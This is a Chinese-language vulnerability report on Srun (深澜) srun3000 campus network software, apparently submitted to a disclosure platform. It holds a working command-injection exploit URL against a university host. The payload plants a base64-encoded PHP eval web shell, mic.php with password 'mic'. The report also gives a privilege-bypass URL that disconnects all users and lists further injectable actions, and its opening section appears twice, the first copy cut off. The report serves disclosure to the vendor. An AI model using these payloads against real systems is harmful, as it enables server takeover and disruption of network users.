VULHUB ™

### 简要描述： 深澜一处命令执行 越权 之前没实例不给通过现在附一个 河北某大学的 ### 详细说明： 先看源码，简单粗暴命令执行，但是没给审核，于是就有了后文 ``` switch ( $_GET['action'] ) { case "drop_user" : if ( $_GET['ipv'] == "ipv4" ) { if ( $_GET['uname1'] == "-all" ) { $pfd = popen( "/srun3/bin/online_user -4 -d ".$_GET['uname1'], "r" ); //命令执行 } else { $pfd = popen( "/srun3/bin/online_user -4 -D ".$_GET['uname1'], "r" ); udp_send( $_GET['ip'], 10333, "0&您已被强制断线" ); } }} } ``` ### 漏洞证明： 实例中srun3000部署在内网。于是通过dmz一台主机代理访问测试。 根据源码 http://202.206.x.x/do_command.php?action=drop_user&ipv=ipv4&uname1=1|echo "<?php file_put_contents(base64_decode(L3NydW4zL3dlYi9taWMucGhw'),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydtaWMnXSk7Pz4='));?>">/srun3/web/1.php 写上去1.php 访问生成mic.php 密码mic （已删除） [<img src="https://images.seebug.org/upload/201405/2511590699de98602a4a71e846677b49d021d902.png" alt="web.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/2511590699de98602a4a71e846677b49d021d902.png) 还有越权 可以踢掉所有人。...

### 简要描述： 深澜一处命令执行 越权 之前没实例不给通过现在附一个 河北某大学的 ### 详细说明： 先看源码，简单粗暴命令执行，但是没给审核，于是就有了后文 ``` switch ( $_GET['action'] ) { case "drop_user" : if ( $_GET['ipv'] == "ipv4" ) { if ( $_GET['uname1'] == "-all" ) { $pfd = popen( "/srun3/bin/online_user -4 -d ".$_GET['uname1'], "r" ); //命令执行 } else { $pfd = popen( "/srun3/bin/online_user -4 -D ".$_GET['uname1'], "r" ); udp_send( $_GET['ip'], 10333, "0&您已被强制断线" ); } }} } ``` ### 漏洞证明： 实例中srun3000部署在内网。于是通过dmz一台主机代理访问测试。 根据源码 http://202.206.x.x/do_command.php?action=drop_user&ipv=ipv4&uname1=1|echo "<?php file_put_contents(base64_decode(L3NydW4zL3dlYi9taWMucGhw'),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydtaWMnXSk7Pz4='));?>">/srun3/web/1.php 写上去1.php 访问生成mic.php 密码mic （已删除） [<img src="https://images.seebug.org/upload/201405/2511590699de98602a4a71e846677b49d021d902.png" alt="web.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/2511590699de98602a4a71e846677b49d021d902.png) 还有越权 可以踢掉所有人。 http://202.206.x.x/do_command.php?action=drop_user&ipv=ipv4&uname1=-all [<img src="https://images.seebug.org/upload/201405/25120209ca52ac8d0a72f7989b2302d9ffcdea6a.png" alt=".png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/25120209ca52ac8d0a72f7989b2302d9ffcdea6a.png) 影响数据 [<img src="https://images.seebug.org/upload/201405/251202422e6ff5c6f3255e3059b91de18daffa48.png" alt=".png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/251202422e6ff5c6f3255e3059b91de18daffa48.png) ps：这句话一会可以删掉：后面还有几个命令执行的地方每个都需要这样写实例吗？麻烦狗哥了。 注：经测试 action=drop_user1、action=dm_drop_user&sid＝、action=rad_drop_user&uname1＝、action=rad_drop_user1&uname1=、action＝disable_user&uname1＝ 等 都存在命令执行漏洞 请官方自查